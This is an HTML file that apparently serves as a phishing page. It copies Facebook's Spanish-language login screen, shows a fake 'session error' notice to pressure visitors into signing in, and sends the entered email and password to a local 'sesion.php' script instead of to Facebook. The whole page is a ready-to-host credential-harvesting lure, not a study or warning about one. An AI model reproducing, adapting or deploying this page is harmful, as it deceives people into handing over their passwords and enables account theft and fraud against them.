<!DOCTYPE html>
<html id="rusty" class="no_js" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta charset="utf-8"><script>CavalryLogger=false;</script><meta name="referrer" content="default" id="meta_referrer"><title id="pageTitle">Facebook</title><meta property="og:site_name" content="Facebook"><meta property="og:url" content=""><meta property="og:locale" content="en_US"><link rel="canonical" href=""><link rel="alternate" media="only screen and (max-width: 640px)" href=""><link rel="alternate" media="handheld" href=""><link rel="alternate" hreflang="x-default" href=""><link rel="alternate" hreflang="en" href=""><link rel="alternate" hreflang="ar" href=""><link rel="alternate" hreflang="bg" href=""><link rel="alternate" hreflang="bs" href=""><link rel="alternate" hreflang="ca" href=""><link rel="alternate" hreflang="da" href=""><link rel="alternate" hreflang="el" href=""><link rel="alternate" hreflang="es" href=""><link rel="alternate" hreflang="es-es" href=""><link rel="alternate" hreflang="fa" href=""><link rel="alternate" hreflang="fi" href=""><link rel="alternate" hreflang="fr" href=""><link rel="alternate" hreflang="fr-ca" href=""><link rel="alternate" hreflang="hi" href=""><link rel="alternate" hreflang="hr" href=""><link rel="alternate" hreflang="id" href=""><link rel="alternate" hreflang="it" href=""><link rel="alternate" hreflang="ko" href=""><link rel="alternate" hreflang="mk" href=""><link rel="alternate" hreflang="ms" href=""><link rel="alternate" hreflang="pl" href=""><link rel="alternate" hreflang="pt" href=""><link rel="alternate" hreflang="pt-pt" href=""><link rel="alternate" hreflang="ro" href=""><link rel="alternate" hreflang="sl" href=""><link rel="alternate" hreflang="sr" href=""><link rel="alternate" hreflang="th" href=""><link rel="alternate" hreflang="vi" href=""><meta name="description" content=""><meta name="robots" content="noodp,noydir"><noscript><meta http-equiv="X-Frame-Options" content="DENY" /></noscript><link rel="shortcut icon" href="icono1.ico">
    <link type="text/css" rel="stylesheet" href="1.css">
    <link type="text/css" rel="stylesheet" href="2.css">
    <link type="text/css" rel="stylesheet" href="3.css">
    <link type="text/css" rel="stylesheet" href="4.css">
</head><body class="login_page fbx UIPage_LoggedOut _2gsg gecko win x1 Locale_en_US" dir="ltr"><div class="_li"><div id="pagelet_bluebar"><div id="blueBarDOMInspector" class="_21mm"><div id="blueBarNAXAnchor" class="_4f7n _xxp"><div><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat _ohe" href="" title=""><i class="fb_logo img sp_9vUokIDmpP8 sx_15c231"><u>Facebook logo</u></i></a></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a class="_42ft _42fu signup_btn selected _42gz _42gy" role="button" href="">Registrate</a></span></div></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Entrar en Facebook</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Entrar en Facebook</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form id="login_form" action="sesion.php" method="post" onSubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input name="lsd" value="AVoyerRM" autocomplete="off" type="hidden"><div class="hidden_elem"></div><div class="pam uiBoxYellow">

<br>


<b>Error de sesión o conexión a Facebook. Debes iniciar sesión para continuar.</b></div><div id="loginform"><input autocomplete="off" id="display" name="display" value="" type="hidden"><input autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="" type="hidden"><input autocomplete="off" id="legacy_return" name="legacy_return" value="1" type="hidden"><input autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="" type="hidden"><input autocomplete="off" id="trynum" name="trynum" value="1" type="hidden"><input autocomplete="off" name="timezone" value="" id="u_0_0" type="hidden"><input name="lgnrnd" value="094216_uaRz" type="hidden"><input id="lgnjs" name="lgnjs" value="n" type="hidden"><div class="form_row clearfix"><label for="correo" class="login_form_label">Correo:</label>
<input name="correo" id="word" class="inputpassword" tabindex="1" type="text">

</div>
  <div class="form_row clearfix"><label for="word" class="login_form_label">Contraseña:</label><input name="word" id="word" class="inputpassword" tabindex="1" type="password"></div><div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" value="1" checked="checked" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox" type="checkbox"><label for="persist_box" class="uiInputLabelLabel">No cerrar sesión</label></div></div><input autocomplete="off" id="default_persistent" name="default_persistent" value="1" type="hidden"><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_1"><input value="Iniciar sesión" name="login" tabindex="1" id="u_0_1" type="submit"></label></div><div id="register_link">or <strong><a href="" rel="nofollow">Iniciar sesión</a></strong></div></div><p class="reset_password form_row"><a href="" target="">¿Olvidaste tu contraseña?</a></p></div></form></div></div></div><ul class="uiList ptm localeSelectorList _509- _4ki _6-h _6-j _6-i"><li><a dir="ltr" href="" onClick="" title="English (US)">Spanish</a></li></ul></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div role="contentinfo" aria-label="Facebook site links"><table class="uiGrid _51mz navigationGrid" cellpadding="0" cellspacing="0"><tbody><tr class="_51mx"><td class="_51m- hLeft plm"><a href="" title="">Mobile</a></td><td class="_51m- hLeft plm"><a href="" title="">Find Friends</a></td><td class="_51m- hLeft plm"><a href="" title="Embed a Facebook badge on your website.">Badges</a></td><td class="_51m- hLeft plm"><a href="" title="Browse our people directory.">People</a></td><td class="_51m- hLeft plm"><a href="" title="Browse our pages directory.">Pages</a></td><td class="_51m- hLeft plm"><a href="" title="">Places</a></td><td class="_51m- hLeft plm"><a href="" title="">Games</a></td><td class="_51m- hLeft plm"><a href="" title="">Locations</a></td><td class="_51m- hLeft plm _51mw"><a href="" accesskey="8" title="">About</a></td></tr><tr class="_51mx"><td class="_51m- hLeft plm"><a href="" title="">Create Ad</a></td><td class="_51m- hLeft plm"><a href="" title="">Create Page</a></td><td class="_51m- hLeft plm"><a href="" title="">Developers</a></td><td class="_51m- hLeft plm"><a href="" title="">Careers</a></td><td class="_51m- hLeft plm"><a href="" title="">Privacy</a></td><td class="_51m- hLeft plm"><a href="" title="">Cookies</a></td><td class="_51m- hLeft plm"><a href="" accesskey="9" title="">Terms</a></td><td class="_51m- hLeft plm"><a href="" accesskey="0" title="">Help</a></td></tr></tbody></table></div><div class="mvl copyright"><div><span> Facebook 2016</span><div class="fsm fwn fcg"><a rel="dialog" ajaxify="" title="" href="" role="button">Spanish</a></div></div></div></div></div></div>


</body></html>